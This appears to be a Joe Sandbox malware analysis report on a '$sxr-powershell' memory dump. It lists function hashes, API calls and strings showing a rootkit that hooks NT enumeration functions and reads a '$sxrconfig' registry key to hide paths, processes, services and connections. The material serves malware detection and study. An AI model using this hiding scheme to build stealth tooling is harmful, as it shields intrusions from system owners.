                                                                                                                      • Instruction Fuzzy Hash: E351AF66710E9CC9EF14DBA69C0869D7BA1FBD8BD8F844525EE190BB85DB38C0499320
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 423 242878b1650-242878b16e2 GetProcessHeap call 242878c3180 call 242878b1274 call 242878b1000 call 242878b1274 * 3 call 242878b1000 * 3 RegOpenKeyExW 442 242878b18ce-242878b18d8 423->442 443 242878b16e8-242878b170f RegOpenKeyExW 423->443 444 242878b1711-242878b1715 443->444 445 242878b1727-242878b1749 RegOpenKeyExW 443->445 446 242878b1718 call 242878b12c8 444->446 447 242878b174b-242878b174f 445->447 448 242878b1762-242878b1784 RegOpenKeyExW 445->448 449 242878b171d-242878b1721 RegCloseKey 446->449 450 242878b1753 call 242878b104c 447->450 451 242878b179d-242878b17bf RegOpenKeyExW 448->451 452 242878b1786-242878b178a 448->452 449->445 453 242878b1758-242878b175c RegCloseKey 450->453 455 242878b17c1-242878b17c5 451->455 456 242878b17d8-242878b17fa RegOpenKeyExW 451->456 454 242878b178e call 242878b12c8 452->454 453->448 459 242878b1793-242878b1797 RegCloseKey 454->459 460 242878b17c9 call 242878b12c8 455->460 457 242878b17fc-242878b1800 456->457 458 242878b1813-242878b1835 RegOpenKeyExW 456->458 461 242878b1804 call 242878b12c8 457->461 462 242878b184e-242878b1870 RegOpenKeyExW 458->462 463 242878b1837-242878b183b 458->463 459->451 464 242878b17ce-242878b17d2 RegCloseKey 460->464 465 242878b1809-242878b180d RegCloseKey 461->465 467 242878b1872-242878b1876 462->467 468 242878b1889-242878b18ab RegOpenKeyExW 462->468 466 242878b183f call 242878b104c 463->466 464->456 465->458 469 242878b1844-242878b1848 RegCloseKey 466->469 470 242878b187a call 242878b104c 467->470 471 242878b18ad-242878b18b1 468->471 472 242878b18c4-242878b18c8 RegCloseKey 468->472 469->462 473 242878b187f-242878b1883 RegCloseKey 470->473 474 242878b18b5 call 242878b104c 471->474 472->442 473->468 475 242878b18ba-242878b18be RegCloseKey 474->475 475->472
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                      • String ID: SOFTWARE\$sxrconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                      • API String ID: 106492572-3028563969
                                                                                                                      • Opcode ID: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
                                                                                                                      • Instruction ID: d0667cff50b6383790cebcfb198c96d949f041649ec966473b764f80f9bd9b6c
                                                                                                                      • Opcode Fuzzy Hash: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
                                                                                                                      • Instruction Fuzzy Hash: 60710826711E59C6FB509F66EC9869D37A4FBC8B88F801121EE4D47B28DF38C449E760
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentThread$AddressHandleLibraryLoadModuleProc
                                                                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$Sysprep_Clean_Validate_Opk$advapi32.dll$ntdll.dll$sechost.dll$spopk.dll
                                                                                                                      • API String ID: 1741086925-759476645
                                                                                                                      • Opcode ID: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                                      • Instruction ID: 74af722d704aa52d7dd80c06996a5d7b5c90cc0874eb437132ae27abcaad0d5a
                                                                                                                      • Opcode Fuzzy Hash: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                                      • Instruction Fuzzy Hash: 0141B264222E4EE1FA84EB67EC9E6DC3329A7C4354FC44413B40906172AE78C28EF371
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                      • String ID: d
                                                                                                                      • API String ID: 2005889112-2564639436
                                                                                                                      • Opcode ID: 6bcc7a94b8732a062315a7af28d29bd62de89db6d10a7923a3b74cbbd2f289e1
                                                                                                                      • Instruction ID: 8dd657620ce537d9c9411cb04f0a32aaed89b0dbb4a0c8a547b4d40bfc6c0a42
                                                                                                                      • Opcode Fuzzy Hash: 6bcc7a94b8732a062315a7af28d29bd62de89db6d10a7923a3b74cbbd2f289e1
                                                                                                                      • Instruction Fuzzy Hash: B8515A72605F48D7F754CF62E94839EB7A2F7C8B80F848125EA4907B14EF38C05AA750
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                      • String ID: \\.\pipe\$sxrchildproc34226543a32$\\.\pipe\$sxrchildproc38764243a64
                                                                                                                      • API String ID: 2171963597-1213686612
                                                                                                                      • Opcode ID: 222afe9738357af78c0991e138f7f32301e44ba52e3deabe560e99e21132f038
                                                                                                                      • Instruction ID: fd1154e5a97ad47fd7dfc1f032cceb0fd5da4c058c203308de1f2b76b8124cd7
                                                                                                                      • Opcode Fuzzy Hash: 222afe9738357af78c0991e138f7f32301e44ba52e3deabe560e99e21132f038
                                                                                                                      • Instruction Fuzzy Hash: 13213936614A48C3FB50CB26E85835E73A1F3C9BA5F944215EA5A42BA8DF3CC14DEB11
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                      • String ID: d
                                                                                                                      • API String ID: 3743429067-2564639436
                                                                                                                      • Opcode ID: 3405b6d6aca030105382ba4e18177f2fb021de4e8f3198299b80cfe6290b74ba
                                                                                                                      • Instruction ID: 902e14018565562aa35a409fde77efcfef2adf4e2c18ee7cd3c258b4c7d20de7
                                                                                                                      • Opcode Fuzzy Hash: 3405b6d6aca030105382ba4e18177f2fb021de4e8f3198299b80cfe6290b74ba
                                                                                                                      • Instruction Fuzzy Hash: A5418033614B84DBE7608F62E84879EB7A1F3C9B84F408125EB890BB54DF38D169DB10
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2924790905.0000024287880000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000024287880000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_24287880000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 190073905-0
                                                                                                                      • Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                                      • Instruction ID: 48f2fb88e1756e85ee90db38ca22e48e40a0204e5f82cdc94c6fed6a3fef0abc
                                                                                                                      • Opcode Fuzzy Hash: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                                      • Instruction Fuzzy Hash: 2281DF21700E4DC6FA60AB679C4D39D72E1ABC6784FC84425BA2597797DB39C84DB330
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 190073905-0
                                                                                                                      • Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                                      • Instruction ID: c94fe917d8982e622e4ea7673f8c3e62ea09d20832aedbb4e7a19b0a91dbf12f
                                                                                                                      • Opcode Fuzzy Hash: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                                      • Instruction Fuzzy Hash: F981C120604F4DC6FAA4AB779C4D35D7291ABC5B80FDC4426BA0947B96DB38C94EB730
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                      • String ID: api-ms-
                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                      • Opcode ID: b9fc0f4bc552b3b3a9613ae8c221c9ea50584cfdf87ea6a2e8fae9693c69d0a1
                                                                                                                      • Instruction ID: a39331e6bca1afab7eba74c8a94299d882aaa60abddbcbd36736378cac2adc5c
                                                                                                                      • Opcode Fuzzy Hash: b9fc0f4bc552b3b3a9613ae8c221c9ea50584cfdf87ea6a2e8fae9693c69d0a1
                                                                                                                      • Instruction Fuzzy Hash: B631A431312E58D1FE919B23AC4879D7298BBD4BA0F990525FD2D47795EF38C44DA320
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                      • String ID: CONOUT$
                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                      • Opcode ID: f8e4fb7eb8850db5dfc64f60f3363a5c279c997be71987712cd29a709cc65782
                                                                                                                      • Instruction ID: e9b8c1dbf4e9a2362e80e279a4bbb389f60b78c27a9a705bc7eec1bf1d39c8f4
                                                                                                                      • Opcode Fuzzy Hash: f8e4fb7eb8850db5dfc64f60f3363a5c279c997be71987712cd29a709cc65782
                                                                                                                      • Instruction Fuzzy Hash: 0E118B22715F44C6F3908B43EC4831D76A0F7C8BE4F804225FA1D87B94CB38C8089760
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$Current$Context
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1666949209-0
                                                                                                                      • Opcode ID: a98e7eacdc5a578abce32cb4d6227d29aaf631d1a1811a31ba6b33f7cbd6c913
                                                                                                                      • Instruction ID: e5794828e695e22a818fd33cf6ab3cda79581dfeaa2543085c128657eae6a2e2
                                                                                                                      • Opcode Fuzzy Hash: a98e7eacdc5a578abce32cb4d6227d29aaf631d1a1811a31ba6b33f7cbd6c913
                                                                                                                      • Instruction Fuzzy Hash: 5CD19A76209F88C5EA70DB1BE89835EB7A0F7C8B84F540216EA8D47BA5DF38C545DB10
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocFree
                                                                                                                      • String ID: $sxr
                                                                                                                      • API String ID: 756756679-21942930
                                                                                                                      • Opcode ID: a56984c12cd63be28461b1521c27a5cf1022700db7ead991f356a21bfefe692f
                                                                                                                      • Instruction ID: f66fb2cb3932431e194da0d9eaa7b422ed020b336a6d80b32caebd582fe197e1
                                                                                                                      • Opcode Fuzzy Hash: a56984c12cd63be28461b1521c27a5cf1022700db7ead991f356a21bfefe692f
                                                                                                                      • Instruction Fuzzy Hash: 42315922706F59D6E6659F57AD4826D77A0FBC4B81F888020AF8D07B54EB38C4AA9710
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 517849248-0
                                                                                                                      • Opcode ID: dd2bb52e115c473e0f8e08ec62385b9b1bc9a7885310831d85afcbe291b8297d
                                                                                                                      • Instruction ID: 6fd552651bf41ff59910230984b63b0f898a99eb8231d2507238e39df19b135e
                                                                                                                      • Opcode Fuzzy Hash: dd2bb52e115c473e0f8e08ec62385b9b1bc9a7885310831d85afcbe291b8297d
                                                                                                                      • Instruction Fuzzy Hash: 54010521705E89D6FA549B13A85875A73A1F7C8BC0F888035EE8D47B54DE38C98AA760
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 449555515-0
                                                                                                                      • Opcode ID: 4f9aa0d141a117e5b28f836a31fda0da5fbbd9299a6c1a47c4e907238d40991d
                                                                                                                      • Instruction ID: dddd77ee791c562a4c33df3d3f473380d27cf68cbb84931d060fb07edb62c819
                                                                                                                      • Opcode Fuzzy Hash: 4f9aa0d141a117e5b28f836a31fda0da5fbbd9299a6c1a47c4e907238d40991d
                                                                                                                      • Instruction Fuzzy Hash: 20113566612F48C6FBA09B27EC4C35D32A0FBC8B81F840429E95D06B64EF3DC04DA721
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                      • String ID: csm$f
                                                                                                                      • API String ID: 2395640692-629598281
                                                                                                                      • Opcode ID: e553a6fcd8766cf47cad89aa0da34990ab2b17b041ac015739fdea2a23d0852d
                                                                                                                      • Instruction ID: c1c123ca0641713c68203219e0ffc54685fbf85b2ec4172715252fd7364f4129
                                                                                                                      • Opcode Fuzzy Hash: e553a6fcd8766cf47cad89aa0da34990ab2b17b041ac015739fdea2a23d0852d
                                                                                                                      • Instruction Fuzzy Hash: EA51C132711A09CAEB54CF16EC48B5D3795F3E9B98F968124FE1647788EB34C849E720
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                                                                      • String ID: \\?\
                                                                                                                      • API String ID: 2719912262-4282027825
                                                                                                                      • Opcode ID: b063e99747d40705daecabcc818f010f8e057a4149015bdb718489c079619189
                                                                                                                      • Instruction ID: 4fa11f10fef5e89c24eb0de7343fec5ec2b4adfeea31e67e16c4c15da7b5df42
                                                                                                                      • Opcode Fuzzy Hash: b063e99747d40705daecabcc818f010f8e057a4149015bdb718489c079619189
                                                                                                                      • Instruction Fuzzy Hash: 34F04462704A45D2F7A09B62FC9839D7760F7C4B88FC48024EA4D4A954DF2CC68DE710
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CombinePath
                                                                                                                      • String ID: \\.\pipe\
                                                                                                                      • API String ID: 3422762182-91387939
                                                                                                                      • Opcode ID: 275731b5076b0e6dc254ebb2ecc66cd3e96493bb62629767b69f00e53740df4b
                                                                                                                      • Instruction ID: 5498393feef0156989373553bb61534f94d641770095060aaad74aca0dab6f7a
                                                                                                                      • Opcode Fuzzy Hash: 275731b5076b0e6dc254ebb2ecc66cd3e96493bb62629767b69f00e53740df4b
                                                                                                                      • Instruction Fuzzy Hash: B9F05E64205F98D1FA408B53BD1915DB221EBC8FD1F848130AE5E07F28CE28C48AA315
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                      • Opcode ID: 998d7d4103a02a9e6d60ca2871a9eec56d3e9844af320b42809f87498ae3ac58
                                                                                                                      • Instruction ID: 332f17eb063b624679cbf6d0a9cbdf615f9b0e9490207be013e0093f6317414e
                                                                                                                      • Opcode Fuzzy Hash: 998d7d4103a02a9e6d60ca2871a9eec56d3e9844af320b42809f87498ae3ac58
                                                                                                                      • Instruction Fuzzy Hash: 67F0F861712F48D1FF988B62EC8C36D3760ABC8B51F841019B91F86A64DE28C59DF721
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2882836952-0
                                                                                                                      • Opcode ID: 09a1da4ea647e200bc3592a5ab7a7466c61b6a393229a681a1c2ded621564b7f
                                                                                                                      • Instruction ID: 0a39ea921eb67ed782d92d3fc2de42422d6a4c758dceafc74a8080b3a9199516
                                                                                                                      • Opcode Fuzzy Hash: 09a1da4ea647e200bc3592a5ab7a7466c61b6a393229a681a1c2ded621564b7f
                                                                                                                      • Instruction Fuzzy Hash: A2029832219B88C6E7A0CB56E89435EB7A0F3C5794F504115FA8E87BA9DF7DC448DB10
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2210144848-0
                                                                                                                      • Opcode ID: 805c3f4572016d1162eba903c1866f821554d6bcbc59870d2561a84f84d0e957
                                                                                                                      • Instruction ID: 3f9f3b84be64b8745001d2116f5a85431cda3b57e411a89a6a5880cc7364790e
                                                                                                                      • Opcode Fuzzy Hash: 805c3f4572016d1162eba903c1866f821554d6bcbc59870d2561a84f84d0e957
                                                                                                                      • Instruction Fuzzy Hash: 4181AC22612E58C9FB909B679C483AD77A0F7C4BD8FC44116FA2A57A92DB34844DE730
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2882836952-0
                                                                                                                      • Opcode ID: 98b2d38467aad0f12371f4981a99e71c5d2d9a384676790713b3d681f93ff9b7
                                                                                                                      • Instruction ID: 0811d2ca5b0f4b6e16456fe10dea33610728cfd05e530190163d110fbe4016c4
                                                                                                                      • Opcode Fuzzy Hash: 98b2d38467aad0f12371f4981a99e71c5d2d9a384676790713b3d681f93ff9b7
                                                                                                                      • Instruction Fuzzy Hash: F061A836519B88C6E760DB17E88831EB7A0F3C8B54F945116FA8D47BA8DB78C548DF10
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2924790905.0000024287880000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000024287880000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_24287880000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _set_statfp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1156100317-0
                                                                                                                      • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                                      • Instruction ID: a7a99281917c1e6bfa78649dbdc5c2bf284f30a296fcc56181bacae0688647ed
                                                                                                                      • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                                      • Instruction Fuzzy Hash: 3A118626E5CF09C2F764116BDC9D36D34A0ABD4376FD84624BA7706FEA8A1C88497220
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _set_statfp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1156100317-0
                                                                                                                      • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                                      • Instruction ID: c639fa3b88079f2b8429a1821158bfec4b42d62e2f4a60f41a4124fe0582ca4e
                                                                                                                      • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                                      • Instruction Fuzzy Hash: E911A7A2E79E0DC1F6E81167DCDD76D30446BE5370FC44624BB66067D68B5848897330
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
